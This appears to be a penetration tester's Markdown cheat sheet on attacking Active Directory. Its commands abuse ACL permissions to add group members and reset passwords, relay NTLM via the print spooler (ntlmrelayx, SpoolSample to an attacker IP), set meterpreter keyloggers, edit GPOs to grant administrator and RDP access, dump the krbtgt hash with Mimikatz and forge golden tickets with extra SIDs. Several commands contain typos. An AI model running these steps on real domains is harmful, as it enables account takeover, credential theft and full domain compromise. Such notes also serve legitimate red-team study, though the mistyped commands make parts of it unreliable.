# Active Directory Misconfigurations ## Permission Delegation * Permissions to functions may be delegated as a standard functions itself * Privilege creep becomes a problem eventually * Discretionary ACLs are controlled by Access Control Entries (ACEs) ### The following ACEs are critical and prone to be exploited * __GenericAll__, complete control and creation of an object * __ForceChangePassword__, change the password of a user and sometimes administrator passwords * __AddMembers__, add a user to an existing group * __GenericWrite__, update any non-protected parameters of the target, e.g. paths to scripts. * __WriteOwner__, change owner of a target object. * __WriteDACL__, create new ACEs to an object's DACL * __AllExtendendRights__ all control over an object's permission ### Tools to exploit ACEs * AD-RSAT * Powersploit * BloodHound, check permissions to target ### Usage * Add user to a group via powershell ```sh Add-GroupMember "" -Members "" ``` * List info about groups, preferably administration groups ```sh Get-ADGroupMember -Identity "" ``` * Set new password for user, afterwards reconnect session ```sh $Password = ConvertTo-SecureString "password123#" -AsPlainText -Force Set-ADAccountPassword -Identity "" -Reset -NewPassword $Password ``` ## Kerberos Delegation * Unconstrained (without limit) delegation, [exploit](https://medium.com/@riccardo.ancarani94/exploiting-unconstrained-delegation-a81eabbd6976) * Constrained delegation * Resource based constrained delegation (RBCD), service owner specifies which resources can bind. Set by [msDS-AllowedToActOnBehalfOfOtherIdentity](https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/) ### Delegatable Services * __HTTP__ * __CIFS__ * __LDAP__ * __HOST__ * __MSSQL__ ### Usage * Enumerate via powerview ```sh Import-Module .\PowerView.ps1 Get-NetUser -TrustedToAuth ``` ## Automated Relays ### Machine Accounts * Administrative machine account of one host having administrative permissions over another host ### Printers * Target has to have an SMB server * Spooler, PetitPotam, PrintNightmare are printer exploits * Query printer services through a servers domain ```sh GWMI Win32_Printer -Computer Get-PrinterPort -ComputerName ``` * SMB signing may be enabled but must not be enforced in order for the exploit to work, check via ```sh nmap --script smb2-securitymode -p 445 printer.example.com plotter.example.com ``` * Start SMB relay on attacker, use IP instead of domain to trigger NTLM auth ```sh ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug ``` * Authenticate on attacker with the credentials already gained from a windows computer ```sh SpoolSample.exe "$ATTACKER_IP" ``` * Authenticate with the received credential ```sh ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug -c 'whoami /all' -debug ``` ## Active Directory Users ### Credentials ### Keylogging * With a meterpreter shell migrate to an active user's process and set a keylogger ```sh migrate keyscan_start ``` * To inspect the results ```sh keyscan_dump ``` ## Group Policy Objects * Every `GPO` has a `GUID` * Local Policies are configured for application rules for FW, Windows-Defender, Applocker * Other local policies are group memberships, startup config, protocols * Group policies change configuration of these remotely over AD * `GPOs` are stored on the `SYSVOL` to be distributed to any machine in the domain ### Usage * Target is to add the user to either an RDP or SSH group and to connect via this group afterwards * Start a `cmd` with a AD user and execute `mmc` through it ```sh runas /netonly /user:\ cmd.exe mmc ``` * Check connection of the `cmd.exe` via ```sh dir \\\sysvol ``` * Click `File` -> Add/Remove Snap-in -> `Group Policy Management` -> `OK` * On the left tree do `Group Policy Management` -> `Forest bla` -> `Domains` -> `` -> `Server` -> `Management Servers` and right click to edit the group * On the left tree `Computer Configuration` -> `Policies` -> `Windows Settings` -> `Security Settings` -> right click `Restricted Groups` -> `Add Group` -> name like `IT Support` -> edit the group and Add `Administrators` and `Remote Desktop Users` groups ## Certificates * [AD Certificate Services](./AD_CS.md) ## Domain Trusts * Domain Trusts offer access to resources to users in the domain * Directional, from trusted domain to another truster domain * Transitive, beyond more than just one other domain * Pwn parent child relationship between directional domain trusts via krbtgt and a golden ticket * `krbtgt` as an account signs and encrypts TGTs * Crafting a golden ticket by becoming a TGS. Following info is needed * FQDN * Security identifier of the domain (SI) * Target's username * __KRBTGT password hash__ store on the DC ### Usage * `KRBTGT` via Mimikatz, resulting in `Hash NTLM` ```sh privilege::debug lsadump::dsync /user: ``` * Craft the ticket with the help of this hash * Alternatively, InterRealm TGTs are used to get resources between domains in order to pwn the parent by adding the Enterprise Admin group as an extraSID,commonly this is `S-1-5-21--519` * SID of Child DC is needed, as well as the SID of the Enterprise Admin in the parent domain * Get child SIDs via ```sh Get-ADComputer -Identity "" ``` * Get parent SID via ```sh Get-ADGroup -Identity "Enterprise Admins" -Server ``` * Include additional SIDs from other domains into `KERB_VALIDATION_INFO` via Mimikatz ```sh privilege::debug kerberos golden /user:Administrator /domain: /sid: /service:kbtgt /rc4: /sids: /ptt exit dir \\DCdomain\dir$ dir \\Parentdomain\dir$ ```